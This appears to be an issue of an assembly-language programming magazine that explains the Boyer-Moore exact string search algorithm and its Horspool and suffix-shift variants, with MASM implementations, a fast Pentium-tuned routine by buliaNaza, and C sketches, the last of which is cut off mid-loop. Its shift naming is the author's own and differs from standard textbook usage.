/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE


Challenge
---------
Code a fast pattern matching algorithm.


Solution
--------
Four approaches are presented here. Three are by Steve Hutchesson, who also
wrote a very good introductory text explaining the foundation of the Boyer
Moore search algorithm and its variations, and one is by buliaNaza, who aims
at writing the fastest binary string search algorithm for PPlain and PMMX
processors.


                             Three Boyer Moore Exact Pattern Matching Algorithms
                             by Steve Hutchesson


Three Boyer Moore Exact Pattern Matching Algorithms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Steve Hutchesson
Sydney
Australia
August 2001
hutch@...

In 1977 Robert S. Boyer and J Strother Moore designed an exact pattern
matching algorithm that was different from any of the contemporary designs.
It had a fundamentally different logic that compared the pattern being
searched for to the current location in the source in reverse order.

The logic was based on obtaining more information from performing the
comparison in reverse than the standard methods of forward comparison. If a
character that caused the mismatch was not among the characters that were
in the pattern being matched, there was no point in matching any further
characters so the pattern could be shifted right by the number of
characters needed to go past it.

This shift has usually been called the BAD CHARACTER shift.

              |
source  : bad character shift
pattern : shift
              |

Character "t" mismatches with character "c" in the source. "c" is not in
the pattern being searched for, so no match is possible at the current
location and there is no point in comparing further back. The pattern is
therefore shifted right far enough to be completely past the mismatching
character.

                   |
source  : bad character shift
pattern :      shift
                   |

Character "t" again mismatches with character "c" in the source so the
pattern is again shifted completely past the mismatching character.

                        |
source  : bad character shift
pattern :           shift
                        |

The next mismatch is different from the previous ones: it is with a character
that is within the pattern being searched for, and this requires a different
type of shift. When the character is within the pattern, the pattern can be
shifted so that its matching character lines up with the one in the source.
This shift is usually called the GOOD SUFFIX shift but it is sometimes called
the MATCHING SHIFT.

The fundamental Boyer Moore design uses a clever method of determining if
the character being compared is within the pattern being searched for or
not. It constructs a table of 256 members which is initially filled with
the length of the pattern being searched for in the source. It then writes,
for each character in the pattern, a shift derived from that character's
position into the table slot indexed by the character's ASCII value.

This means that a character being compared can be tested in one memory read
to determine if it is within the pattern or not: if the shift in the table
is the same as the length of the pattern, the character is not in the
pattern; if it is less, the character is in the pattern.

This will produce a set of shifts for the characters in the pattern that
descend in their value.

pattern : shift
          4321      <- GOOD SUFFIX shift
          12345     <- BAD CHARACTER shift
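The table construction described above can be sketched in C. This is only
an illustration under assumptions: the function name build_shift_table is
invented here, and the rule that the last pattern character is not written
into the table is taken from the assembler listings further down.

```c
#include <stddef.h>

/* Build the 256-entry shift table: every slot starts at the pattern
 * length, then each character except the last one overwrites its slot
 * with a descending count.
 * (build_shift_table is a name invented for this sketch.) */
void build_shift_table(const unsigned char *pat, size_t len,
                       size_t table[256])
{
    size_t i;

    for (i = 0; i < 256; i++)
        table[i] = len;                 /* "not in pattern" marker      */

    for (i = 0; i + 1 < len; i++)
        table[pat[i]] = len - 1 - i;    /* a later occurrence overwrites */
}
```

For the pattern "shift" this leaves 4, 3, 2 and 1 in the slots for "s",
"h", "i" and "f", while "t" and every character outside the pattern keep
the pattern length of 5.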

The method of calculating the BAD CHARACTER shift is based on the ascending
count from the beginning of the pattern. For the first character compared
(the last character of the pattern), the shift is the length of the pattern;
for each further comparison made, the shift decrements by one.

Apply the GOOD SUFFIX shift from the table and the pattern is shifted
across so that the character "s" lines up with the "s" in the source and
the pattern has been matched.

                            *
source  : bad character shift
pattern :               shift
                            *

This example works OK because the mismatch occurs on the first comparison
but in patterns that have repeat sequences of characters, this matching by
itself will often fail to produce a match.

pattern : foooooo
          611111    <- GOOD SUFFIX shift
          1234567   <- BAD CHARACTER shift

The sequence of "1" in the GOOD SUFFIX shift is caused by the overwriting
of the location for the character "o" in the table for each of its
occurrences. The normal method is to subtract the BAD CHARACTER shift from
the GOOD SUFFIX shift if the mismatch is not the first at the current
location in the source. This can produce a value less than 1 so a minimum
shift of 1 is applied if this happens.
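The shift selection can be sketched in C as follows. This is a hedged
reading of the rule rather than the author's code: it follows the
arithmetic of the assembler listings further down, where the table value
is reduced by the number of characters already matched at the current
location. The helper name mismatch_shift and its parameters are invented
for the illustration.

```c
#include <stddef.h>

/* Shift to apply after a mismatch.
 * table : 256-entry shift table (pattern length for absent characters)
 * len   : pattern length
 * j     : pattern index of the mismatch (len - 1 on the first compare)
 * c     : the source character that caused the mismatch
 * (mismatch_shift is a hypothetical helper for this sketch.) */
size_t mismatch_shift(const size_t table[256], size_t len,
                      size_t j, unsigned char c)
{
    size_t matched = (len - 1) - j;   /* characters already matched      */

    if (table[c] == len)              /* not in the table: skip past it  */
        return j + 1;
    if (table[c] <= matched)          /* result would drop below 1       */
        return 1;
    return table[c] - matched;        /* line the character up           */
}
```

With the pattern "foooooo", a mismatch on "o" after six matched characters
would give 1 - 6, so the minimum shift of 1 is returned instead.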

Coding Considerations
~~~~~~~~~~~~~~~~~~~~~
Much of the available technical data on exact pattern matching is written
in ANSI C and it tends to carry the set of assumptions related to the
capacity of that language. The "holy grail" of exact pattern matching is to
perform as few comparisons as necessary to obtain the match if it exists.
This is usually called "sublinearity" and it means comparing fewer
characters than a traditional forward BYTE scanner.

The problem with this approach is that if the overhead to produce the
"sublinearity" is too large, the algorithm is slower than a BYTE scanner so
considerations of theoretical design must be tempered with what is possible
with good coding practice to deliver the desired speed.
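As a point of reference, a traditional forward BYTE scanner can be sketched
in C as below. It is a plain baseline written for this comparison, not code
from the article; the name byte_scan and the return convention (offset of
the first match, or -1) are assumptions of the sketch.

```c
#include <stddef.h>

/* Baseline forward BYTE scanner: try every start position in turn.
 * Returns the zero-based offset of the first match, or -1 if none.
 * (byte_scan is an illustrative name.) */
long byte_scan(const unsigned char *src, size_t src_len,
               const unsigned char *pat, size_t pat_len)
{
    size_t pos, i;

    if (pat_len == 0 || pat_len > src_len)
        return -1;

    for (pos = 0; pos + pat_len <= src_len; pos++) {
        for (i = 0; i < pat_len && src[pos + i] == pat[i]; i++)
            ;                          /* compare left to right */
        if (i == pat_len)
            return (long)pos;
    }
    return -1;
}
```

Every source position is visited here, which is the cost a Boyer Moore
type algorithm tries to avoid by shifting more than one place at a time.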

The BAD CHARACTER shift has often been coded in high level languages as
another table but it is a very inefficient way to code the shift as the
loop counter in the main comparison loop holds the same value and it can be
accessed a lot faster than a member of a table in memory.

The three versions presented below use an Intel specific optimisation that
prevents a partial register stall, which would otherwise occur when a byte
is read and compared in AL and the full EAX register is subsequently used in
the table location calculation. XOR EAX, EAX or SUB EAX, EAX both zero the
register so that the stall does not occur. This makes the code slightly
slower on AMD hardware but not by very much.

There is an additional heuristic in the original Boyer Moore algorithm that
has not been implemented: when a BAD CHARACTER shift has been determined,
the heuristic requires that the larger of the two shifts should be applied.
In practice the two extra instructions to perform this comparison reduce
the speed of the algorithm by about 5%.

Where a GOOD SUFFIX shift is required for the first mismatch at the current
location, the calculation that subtracts the BAD CHARACTER shift is not
required, so a separate loop has been included to save these two extra
instructions. The speed increase is about 5% for doing so.

Processor Variation
~~~~~~~~~~~~~~~~~~~
Testing shows that there are measurable differences between later Intel
processors and later AMD processors. The AMD has a shorter pipeline and a
lower penalty for register stalls, whereas the Intel processors have better
branch prediction and a lower penalty for mispredicted jumps. The GOOD
SUFFIX shift favours the AMD processors, whereas the BAD CHARACTER shift
works better on the Intel processors.

Three variations are implemented that utilise the different shifts: the
original BM algorithm uses both shifts, a variation that is similar to a
Horspool variation uses only the BAD CHARACTER shift, and another variation
uses only the GOOD SUFFIX shift.

Algorithm Variations
~~~~~~~~~~~~~~~~~~~~
The original BM algorithm has a slightly higher overhead than the two
variations but it generally produces a larger shift and this has the effect
that it is more consistent across both processor types with different
patterns and different pattern lengths. This is because it is more
dependent on logic than on fast loop code.

The Horspool variation performs well on Intel hardware and is well suited
for plain text search in things like text editors and word processors but it
is sensitive to patterns whose characters occur with high frequency in the
source being searched. Its advantage is small loop code in the searching
phase. In this implementation, it does the comparison in reverse order as
this method produces the BAD CHARACTER shift in the most efficient manner.
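A C sketch of a variation in this style is given below, under stated
assumptions. It uses only the "skip past a character that is not in the
pattern" shift and otherwise moves one place. Because that is the only
question asked of the table, the sketch replaces the 256 DWORD table with
256 flags; the name bmh_search, the flag array and the return codes (-2 for
a pattern shorter than 2, -1 for no match) are choices made for this
illustration.

```c
#include <stddef.h>

/* Horspool style search using only the "skip past it" shift.
 * Returns the zero-based match offset, -1 for no match, or -2 when the
 * pattern is shorter than two characters.
 * (bmh_search and seen[] are names invented for this sketch.) */
long bmh_search(size_t startpos,
                const unsigned char *src, size_t src_len,
                const unsigned char *pat, size_t pat_len)
{
    unsigned char seen[256] = {0};
    size_t i, pos, last;

    if (pat_len <= 1)
        return -2;
    if (pat_len > src_len)
        return -1;

    for (i = 0; i + 1 < pat_len; i++)
        seen[pat[i]] = 1;              /* all but the last character */

    last = src_len - pat_len;          /* last valid start offset    */
    for (pos = startpos; pos <= last; ) {
        size_t j = pat_len;            /* compare right to left      */
        while (j > 0 && src[pos + j - 1] == pat[j - 1])
            j--;
        if (j == 0)
            return (long)pos;
        if (seen[src[pos + j - 1]])
            pos += 1;                  /* in pattern: minimum shift  */
        else
            pos += j;                  /* not in pattern: skip past  */
    }
    return -1;
}
```

The loop body is very small, which is the property the text credits for
this variation's speed on plain text.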

The second variation uses only the GOOD SUFFIX shift and generally performs
well on older Intel hardware and later AMD machines. It has the advantage of
fast loop code but by only using one of the available shifts, its average
shift length is shorter than that of the original algorithm. It uses the
same bypass for the first mismatch that the original BM algo has.

Limitations
~~~~~~~~~~~
The pattern length threshold for improving on a forward byte scanner appears
to be about 6 characters. Below this a BYTE scanner is faster. A BM type
algorithm has about a 300 character penalty in the time it takes to construct
the table and this must be kept in mind if the task requires recursively
searching short sources for short patterns.

A slightly more subtle consideration is what is called "mismatch recovery".
Boyer Moore algorithms have normally been sensitive to the frequency of end
characters in the pattern and this is easy to demonstrate when searching
plain text when the pattern has a trailing blank space in it.
EXAMPLE : "pattern "

The solution is to code the comparison loop with a very short instruction
path and while this does not particularly increase the absolute forward
scanning speed of the algorithm type, it does improve its recovery from
repeated mismatches.

The three algorithms presented below have very good mismatch recovery, which
is related to the very short instruction paths of their comparison loops.

The three algorithms have been tested on Intel Celeron, PII and PIII
machines and AMD K6-2, Duron and Athlon machines. They have been optimised
to run on both types without specifically targeting one particular model.
Slight speed increases can be obtained by coding specifically for one
particular model but usually at the expense of most other processors.

The parameters for the three procedures:

startpos    zero based offset to start searching in the source
lpSource    the address of the source to search
srcLngth    the length of the source
lpSubStr    the address of the pattern to search for
subLngth    the length of the pattern
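To show how these parameters fit together, here is a C sketch of a search
with the same argument order and the same return convention as the
listings that follow (match offset, -1 for no match, -2 for a pattern
shorter than 2). It is an illustrative port written for this purpose, not
a translation checked against the author's timings; the name bm_search is
an assumption of the sketch.

```c
#include <stddef.h>

/* Boyer Moore style search taking the five parameters listed above.
 * (bm_search is a name invented for this sketch.) */
long bm_search(size_t startpos,
               const unsigned char *src, size_t src_len,
               const unsigned char *pat, size_t pat_len)
{
    size_t table[256];
    size_t i, pos, last;

    if (pat_len <= 1)
        return -2;                      /* pattern too short, must be > 1 */
    if (pat_len > src_len)
        return -1;

    for (i = 0; i < 256; i++)
        table[i] = pat_len;             /* fill with the pattern length   */
    for (i = 0; i + 1 < pat_len; i++)
        table[pat[i]] = pat_len - 1 - i;

    last = src_len - pat_len;           /* last valid start offset        */
    pos = startpos;

    while (pos <= last) {
        size_t j = pat_len;             /* compare right to left          */
        unsigned char c;
        size_t matched;

        while (j > 0 && src[pos + j - 1] == pat[j - 1])
            j--;
        if (j == 0)
            return (long)pos;           /* whole pattern matched          */

        c = src[pos + j - 1];           /* mismatching source character   */
        matched = pat_len - j;          /* characters already matched     */
        if (table[c] == pat_len)
            pos += j;                   /* not in table: skip past it     */
        else if (table[c] <= matched)
            pos += 1;                   /* minimum shift is 1             */
        else
            pos += table[c] - matched;
    }
    return -1;
}
```

Called as bm_search(0, source, 19, pattern, 5) with the source
"bad character shift" and the pattern "shift", the sketch walks through
the same three shifts as the diagrams earlier in the text before matching.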

                 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                 @                                     @
                 @   The basic Boyer Moore algorithm   @
                 @                                     @
                 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

; #########################################################################

     .486
     .model flat, stdcall  ; 32 bit memory model
     option casemap :none  ; case sensitive

     .code

; #########################################################################

BMBinSearch proc startpos:DWORD,
                  lpSource:DWORD,srcLngth:DWORD,
                  lpSubStr:DWORD,subLngth:DWORD

     LOCAL cval   :DWORD
     LOCAL shift_table[256]:DWORD

     push ebx
     push esi
     push edi

     mov ebx, subLngth

     cmp ebx, 1
     jg @F
     mov eax, -2                 ; string too short, must be > 1
     jmp Cleanup
   @@:

     mov esi, lpSource
     add esi, srcLngth
     sub esi, ebx
     mov edx, esi            ; set Exit Length

   ; ----------------------------------------
   ; load shift table with value in subLngth
   ; ----------------------------------------
     mov ecx, 256
     mov eax, ebx
     lea edi, shift_table
     rep stosd

   ; ----------------------------------------------
   ; load descending count values into shift table
   ; ----------------------------------------------
     mov ecx, ebx                ; SubString length in ECX
     dec ecx                     ; correct for zero based index
     mov esi, lpSubStr           ; address of SubString in ESI
     lea edi, shift_table

     xor eax, eax

   Write_Shift_Chars:
     mov al, [esi]               ; get the character
     inc esi
     mov [edi+eax*4], ecx        ; write shift for each character
     dec ecx                     ; to ascii location in table
     jnz Write_Shift_Chars

   ; -----------------------------
   ; set up for main compare loop
   ; -----------------------------
     mov ecx, ebx
     dec ecx
     mov cval, ecx

     mov esi, lpSource
     mov edi, lpSubStr
     add esi, startpos           ; add starting position

     jmp Pre_Loop

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Calc_Suffix_Shift:
     add eax, ecx
     sub eax, cval               ; sub loop count
     jns Add_Suffix_Shift
     mov eax, 1                  ; minimum shift is 1

   Add_Suffix_Shift:
     add esi, eax                ; add SUFFIX shift
     mov ecx, cval               ; reset counter in compare loop

   Test_Length:
     cmp edx, esi                ; test exit condition
     jl No_Match

   Pre_Loop:
     xor eax, eax                ; zero EAX for following partial writes
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     je @F
     mov eax, shift_table[eax*4]
     cmp ebx, eax
     jne Add_Suffix_Shift        ; bypass SUFFIX calculations
     lea esi, [esi+ecx+1]        ; add BAD CHAR shift
     jmp Test_Length
   @@:
     dec ecx
     xor eax, eax                ; zero EAX for following partial writes

   Cmp_Loop:
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     jne Set_Shift               ; if not equal, get next shift
     dec ecx
     jns Cmp_Loop
     jmp Match                   ; fall through on match

   Set_Shift:
     mov eax, shift_table[eax*4]
     cmp ebx, eax
     jne Calc_Suffix_Shift       ; run SUFFIX calculations
     lea esi, [esi+ecx+1]        ; add BAD CHAR shift
     jmp Test_Length

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Match:
     sub esi, lpSource           ; sub source from ESI
     mov eax, esi                ; put length in eax
     jmp Cleanup

   No_Match:
     mov eax, -1

   Cleanup:
     pop edi
     pop esi
     pop ebx

     ret

BMBinSearch endp

; #########################################################################

     end

     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     @                                                               @
     @  The Horspool style variation using the BAD CHARACTER shift   @
     @                                                               @
     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


; #########################################################################

     .486
     .model flat, stdcall  ; 32 bit memory model
     option casemap :none  ; case sensitive

     .code

; #########################################################################

BMHBinsearch proc startpos:DWORD,
                   lpSource:DWORD,srcLngth:DWORD,
                   lpSubStr:DWORD,subLngth:DWORD

     LOCAL cval:DWORD
     LOCAL shift_table[256]:DWORD

     push ebx
     push esi
     push edi

     mov ebx, subLngth

     cmp ebx, 1
     jg @F
     mov eax, -2                 ; string too short, must be > 1
     jmp BMHout
   @@:

     mov esi, lpSource
     add esi, srcLngth
     sub esi, ebx
     mov edx, esi                ; set Exit Length

   ; ----------------------------------------
   ; load shift table with value in subLngth
   ; ----------------------------------------
     mov ecx, 256
     mov eax, ebx
     lea edi, shift_table
     rep stosd

   ; ----------------------------------------------
   ; load descending count values into shift table
   ; ----------------------------------------------
     mov ecx, ebx                ; SubString length in ECX
     dec ecx                     ; correct for zero based index
     mov esi, lpSubStr           ; address of SubString in ESI
     lea edi, shift_table

     xor eax, eax

   Write_Chars:
     mov al, [esi]               ; get the character
     inc esi
     mov [edi+eax*4], ecx        ; write shift for each character
     dec ecx                     ; to ascii location in table
     jnz Write_Chars

   ; -----------------------------
   ; set up for main compare loop
   ; -----------------------------
     mov ecx, ebx
     dec ecx
     mov cval, ecx

     mov esi, lpSource
     mov edi, lpSubStr
     add esi, startpos           ; add starting position

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Main_Loop:
     sub eax, eax                ; zero EAX before partial write
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     jne Get_Shift               ; if not equal, get next shift
     dec ecx
     jns Main_Loop

     jmp Matchx

   Get_Shift:
     inc esi                     ; inc esi for minimum shift
     cmp ebx, shift_table[eax*4] ; cmp subLngth to char shift
     jne Exit_Test
     add esi, ecx                ; add bad char shift
   Exit_Test:
     mov ecx, cval               ; reset counter in compare loop
     cmp esi, edx                ; test for exit condition
     jle Main_Loop               ; ESI == EDX is still a valid position

     jmp MisMatch

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Matchx:
     sub esi, lpSource           ; sub source from ESI
     mov eax, esi                ; put length in eax
     jmp BMHout

   MisMatch:
     mov eax, -1

   BMHout:
     pop edi
     pop esi
     pop ebx

     ret

BMHBinsearch endp

; #########################################################################

     end

         @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
         @                                                        @
         @   The simplified version using the GOOD SUFFIX shift   @
         @                                                        @
         @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

; #########################################################################

     .486
     .model flat, stdcall  ; 32 bit memory model
     option casemap :none  ; case sensitive

     .code

; #########################################################################

SBMBinSearch proc startpos:DWORD,
                   lpSource:DWORD,srcLngth:DWORD,
                   lpSubStr:DWORD,subLngth:DWORD

     LOCAL shift_table[256]:DWORD

     push ebx
     push esi
     push edi

     mov edx, subLngth

     cmp edx, 1
     jg @F
     mov eax, -2                 ; string too short, must be > 1
     jmp Cleanup
   @@:

     mov esi, lpSource
     add esi, srcLngth
     sub esi, edx
     mov ebx, esi                ; set Exit Length

   ; ----------------------------------------
   ; load shift table with value in subLngth
   ; ----------------------------------------
     mov ecx, 256
     mov eax, edx
     lea edi, shift_table
     rep stosd

   ; ----------------------------------------------
   ; load descending count values into shift table
   ; ----------------------------------------------
     mov ecx, edx                ; SubString length in ECX
     dec ecx                     ; correct for zero based index
     mov esi, lpSubStr           ; address of SubString in ESI
     lea edi, shift_table

     xor eax, eax

   Write_Shift_Chars:
     mov al, [esi]               ; get the character
     inc esi
     mov [edi+eax*4], ecx        ; write shift for each character
     dec ecx                     ; to ascii location in table
     jnz Write_Shift_Chars

   ; -----------------------------
   ; set up for main compare loop
   ; -----------------------------

     mov esi, lpSource
     mov edi, lpSubStr
     dec edx
     mov ecx, edx                ; start comparing at the last character
     xor eax, eax                ; zero EAX
     add esi, startpos           ; add starting position

     jmp Cmp_Loop

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Calc_Suffix_Shift:
     add ecx, shift_table[eax*4] ; add shift value to loop counter
     sub ecx, edx                ; sub pattern length - 1
     jns Pre_Compare
     mov ecx, 1                  ; minimum shift is 1

   Pre_Compare:
     add esi, ecx                ; add suffix shift
     mov ecx, edx                ; reset counter for compare loop

   Exit_Text:
     cmp ebx, esi                ; test exit condition
     jl No_Match

     xor eax, eax                ; clear EAX for following partial writes
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     je @F
     add esi, shift_table[eax*4]
     jmp Exit_Text
   @@:
     dec ecx

     xor eax, eax                ; clear EAX for following partial writes
   Cmp_Loop:
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     jne Calc_Suffix_Shift       ; if not equal, get next shift
     dec ecx
     jns Cmp_Loop
     jmp Match                   ; match on fall through

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Match:
     sub esi, lpSource           ; sub source from ESI
     mov eax, esi                ; put length in eax
     jmp Cleanup

   No_Match:
     mov eax, -1

   Cleanup:
     pop edi
     pop esi
     pop ebx

     ret

SBMBinSearch endp

; #########################################################################

     end

********************************** END *************************************


                                          Fastest Binary String Search Algorithm
                                          by buliaNaza


; Fastest binary string search algo with
; PPlain and PMMX type of processors
; <c> 2001 by buliaNaza         ;
;                               ;
.data?                          ;
align 4                        ; !!!
skip_table   DD   256 Dup(?)   ; skip table
;                               ;
;...............................;
; Usage: esi ->pBuffer          ; esi->buffer with bytes to be searched through
;        ebp = lenBuffer        ; ebp =length of the buffer
;        ebx ->pSrchData        ; ebx->pointer to data to be searched for
;        edx = lenSrchData      ; edx=length of data  to be searched for
;        edi ->pskip_table      ; edi->pointer to skip table (must be aligned)
;        call BMCaseSNext       ;
;.................................;
.code                             ;
BMCaseSNext:                      ;
         cmp  edx, 4               ; edx = length of data to be searched for
         jg   Boyer_Moore          ;
;... Brute Force Search ..........; for 4 digits or less only!
         mov  edi, [ebx]           ; edi = dword of data to be searched for
         mov  ecx, 5               ;
         sub  ecx, edx             ;
         lea  eax, [esi+edx-1]     ; eax->new starting address in pBuffer
         shl  ecx, 3               ; *8
         mov  bl,  [ebx+edx-1]     ; get last byte only
         mov  bh,  bl              ; copy in bh
         bswap edi                 ;
         shr  edi, cl              ;
         add  ebp, esi             ; ebp ->end of buffer
         and  ebx, 0FFFFh          ; ebx = need the bx word only
         mov  ecx, ebx             ;
         mov  esi, edx             ; esi=edx = length of data to be searched for
         shl  ecx, 16              ;
         test eax, 3               ;
         lea  ebx, [ebx+ecx]       ;
         jz   Search_2             ;
Unalign_1:                        ;
         cmp  eax, ebp             ; ebp ->end of buffer
         jge  Not_found            ;
         mov  cl, [eax]            ;
         inc  eax                  ;
         cmp  cl, bl               ;
         jz   Compare_1            ;
Search_1:                         ;
         test eax, 3               ;
         jnz  Unalign_1            ;
Search_2:                         ;
         cmp  eax, ebp             ;u ebp ->end of buffer
         jge  Not_found            ;v
         mov  ecx, [eax]           ;u scasb for the last byte from pSrchData
         add  eax, 4               ;v
         xor  ecx, ebx             ;u
         mov  edx, 7EFEFEFFh       ;v
         add  edx, ecx             ;u
         xor  ecx, -1              ;v
         xor  ecx, edx             ;u
         mov  edx, [eax-4]         ;v
         and  ecx, 81010100h       ;u
         jz   Search_2             ;v
                                   ;
         cmp  dl, bl               ;
         jz   Minus_4              ;
         cmp  dh, bl               ;
         jz   Minus_3              ;
         shr  edx, 16              ;
         cmp  dl, bl               ;
         jz   Minus_2              ;
         cmp  dh, bl               ;
         jz   Compare_1            ;
         jnz  Search_2             ;
Minus_2:                          ;
         dec  eax                  ;
         jnz  Compare_1            ;
Minus_4:                          ;
         sub  eax, 3               ;
         jnz  Compare_1            ;
Minus_3:                          ;
         sub  eax, 2               ;
Compare_1:                        ;
         mov  edx, edi             ;
         cmp  eax, ebp             ; ebp ->end of buffer
         jg   Not_found            ;
         cmp  esi, 1               ;
         jz   Found_1              ;
         cmp  dl, [eax-2]          ; eax->pBuffer
         jnz  Search_1             ;
         cmp  esi, 2               ;
         jz   Found_1              ;
         cmp  dh, [eax-3]          ; eax->pBuffer
         jnz  Search_1             ;
         cmp  esi, 3               ;
         jz   Found_1              ;
         shr  edx, 16              ;
         mov  cl, [eax-4]          ; eax->pBuffer
         cmp  dl, cl               ;
         jnz  Search_1             ;
Found_1:                          ;
         sub  eax, esi             ; in eax->pointer to 1st
         ret                       ; occurrence of data found in pBuffer
;...Boyer Moore Case Sens Next Search...;
Boyer_Moore:                      ;
         add  esi, ebp             ; esi->pointer to the last byte of pBuffer
         lea  ebx, [ebx+edx-1]     ; ebx->pointer to the last byte of pSrchData
         neg  edx                  ; edx= -lenSrchData
         mov  ecx, edx             ; ecx = edx = -lenSrchData
         add  ebp, edx             ; sub lenSrchData from lenBuffer
         mov  eax, 256             ; eax = counter
         xor  ebp, -1              ; not ebp->current negative index
MaxSkipLens:                      ;
         mov  [eax*4+edi-4], edx   ; filling up the skip_table with -lenSrchData
         mov  [eax*4+edi-8], edx   ;
         mov  [eax*4+edi-12], edx  ;
         mov  [eax*4+edi-16], edx  ;
         mov  [eax*4+edi-20], edx  ;
         mov  [eax*4+edi-24], edx  ;
         mov  [eax*4+edi-28], edx  ;
         mov  [eax*4+edi-32], edx  ;
         mov  [eax*4+edi-36], edx  ;
         mov  [eax*4+edi-40], edx  ;
         mov  [eax*4+edi-44], edx  ;
         mov  [eax*4+edi-48], edx  ;
         mov  [eax*4+edi-52], edx  ;
         mov  [eax*4+edi-56], edx  ;
         mov  [eax*4+edi-60], edx  ;
         mov  [eax*4+edi-64], edx  ;
         mov  [eax*4+edi-68], edx  ;
         mov  [eax*4+edi-72], edx  ;
         mov  [eax*4+edi-76], edx  ;
         mov  [eax*4+edi-80], edx  ;
         mov  [eax*4+edi-84], edx  ;
         mov  [eax*4+edi-88], edx  ;
         mov  [eax*4+edi-92], edx  ;
         mov  [eax*4+edi-96], edx  ;
         mov  [eax*4+edi-100], edx ;
         mov  [eax*4+edi-104], edx ;
         mov  [eax*4+edi-108], edx ;
         mov  [eax*4+edi-112], edx ;
         mov  [eax*4+edi-116], edx ;
         mov  [eax*4+edi-120], edx ;
         mov  [eax*4+edi-124], edx ;
         mov  [eax*4+edi-128], edx ;
         sub  eax, 32          ;
         jne  MaxSkipLens      ; loop while eax<>0
SkipLens:                     ;
         mov  al, [ecx+ebx+1]  ;u filling up with the real negative offset of
         inc  ecx              ;v every byte from the pSrchData, starting from
         mov  [eax*4+edi], ecx ;u the last to the first, at the offset in
         jne  SkipLens         ;v skip_table equal to the ASCII code of the
                               ;  byte, multiplied by 4
Search:                       ;  the main searching loop-> FAST PART
         mov  al, [esi+ebp]    ;u get a byte  from pBuffer ->esi +ebp
         mov  ecx, edx         ;v ecx=edx= -lenSrchData
         sub  ebp, [eax*4+edi] ;u sub negative offset for this byte from
                               ;  skip_table
         jc   Search           ;v if dword ptr [eax*4+edi] AND ebp <> 0 loop
                               ;  again
         lea  ebp, [ebp+esi+1] ;u current negative index -> next byte (+1)
         jge  Not_found        ;v end of pBuffer control (if ebp>=0 end)
                               ; compare previous bytes from pSrchData (->ebx)
Compare:                      ; and current offset in pBuffer (->ebp)->SLOW
                               ; PART
         mov  eax, [ebx+ecx+1] ; one dword from pSrchData -> ebx
         inc  ecx              ; ecx = -lenSrchData
         jz   Found            ; if ecx = 0 Found&Exit
         cmp  al, [ebp+ecx-1]  ; ebp->pBuffer
         jnz  Not_equal        ;
         inc  ecx              ; ecx = -lenSrchData
         jz   Found            ; if ecx = 0 Found&Exit
         cmp  ah, [ebp+ecx-1]  ; ebp->pBuffer
         jnz  Not_equal        ;
         inc  ecx              ; ecx = -lenSrchData
         jz   Found            ; if ecx=0 Found&Exit
         shr  eax, 16          ;
         inc  ecx              ;
         cmp  al, [ebp+ecx-2]  ; ebp->pBuffer
         jnz  Not_equal        ;
         test ecx, ecx         ; ecx = -lenSrchData
         jz   Found            ; if ecx=0 Found&Exit
         cmp  ah, [ebp+ecx-1]  ; ebp->pBuffer
         jz   Compare          ;
Not_equal:                    ;
         sub  eax, eax         ; eax = 0
         sub  ebp, esi         ; restore ebp->current negative index
         jl   Search           ; end of pBuffer control
Not_found:                    ;
         or   eax, -1          ; Exit with flag Not_Found eax=-1
         ret                   ;
Found:                        ;
         lea  eax, [ebp+edx]   ; in eax->pointer to 1st
         ret                   ; occurrence  of data found in pBuffer
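
For readers who want the skip-table idea without the register juggling, here is
a rough C sketch.  It is not a translation of the routine above: it uses the
simpler Horspool variant of Boyer-Moore, stores positive shifts rather than
negative offsets, skips the brute-force path for short patterns, and returns
NULL instead of -1 when nothing is found.  The name bm_find and its parameters
are made up for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper, not taken from the listing above.  Returns a pointer
   to the first occurrence of pat[0..m) in buf[0..n), or NULL if absent. */
const unsigned char *bm_find(const unsigned char *buf, size_t n,
                             const unsigned char *pat, size_t m)
{
    size_t skip[256];
    size_t i, pos;

    assert(buf != NULL && pat != NULL);
    if (m == 0 || n < m)
        return NULL;

    /* Same role as MaxSkipLens: the default shift is the whole pattern. */
    for (i = 0; i < 256; i++)
        skip[i] = m;

    /* Same role as SkipLens: a byte that occurs in the pattern gets the
       distance from its last occurrence to the end of the pattern.  The
       final pattern byte is left out so that every shift is at least 1. */
    for (i = 0; i + 1 < m; i++)
        skip[pat[i]] = m - 1 - i;

    /* Look at the buffer byte under the pattern's last position, compare
       the whole window, then shift by that byte's table entry. */
    for (pos = 0; pos <= n - m; pos += skip[buf[pos + m - 1]]) {
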